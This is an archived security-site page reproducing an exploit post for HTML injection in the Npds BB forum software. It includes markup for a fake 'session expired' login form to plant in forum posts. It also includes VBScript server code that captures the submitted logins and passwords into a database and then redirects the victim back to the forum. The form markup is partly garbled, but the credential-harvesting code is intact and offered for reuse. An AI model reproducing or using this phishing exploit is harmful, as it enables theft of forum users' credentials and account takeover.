Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web BBS :: etc :: hack3942.htm

Npds BB HTML Injection
Npds BB HTML Injection

I release it very quickly ... So it can be improved :

Code to put in a reply or in a topic :

Your fake message
  Profil  href="" TARGET="_blank" CLASS="NOIR" TARGET="_blank">www  Citation   
action="" method="post" name="piquage" target="_self">
Your session has expired. Please log in to reply.
Login :
Mot de passe :
Example of Code (VBscript) to put in the page called by the form in the topic : <%@ Language=VBScript %> <% set base=server.createobject("ADODB.CONNECTION") nom_base, login_base, password_base referant=left(request.servervariables("HTTP_REFERER"),instr(8,request.servervariables("HTTP_REFERER"),"/")-1) login=Request.QueryString("login") password=Request.QueryString("password") requete_vol_infos="INSERT statistiques (date,npds,login,password) VALUES (getdate(),'" + cstr(referant) + "','" + cstr(login) + "','" + cstr(password) + "')" set resultat_vol_infos=server.CreateObject("ADODB.RECORDSET") resultat_vol_infos.Open requete_vol_infos, base response.redirect(referant) %> Thanks to N-0-X and NewFFR :o) Rituel

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH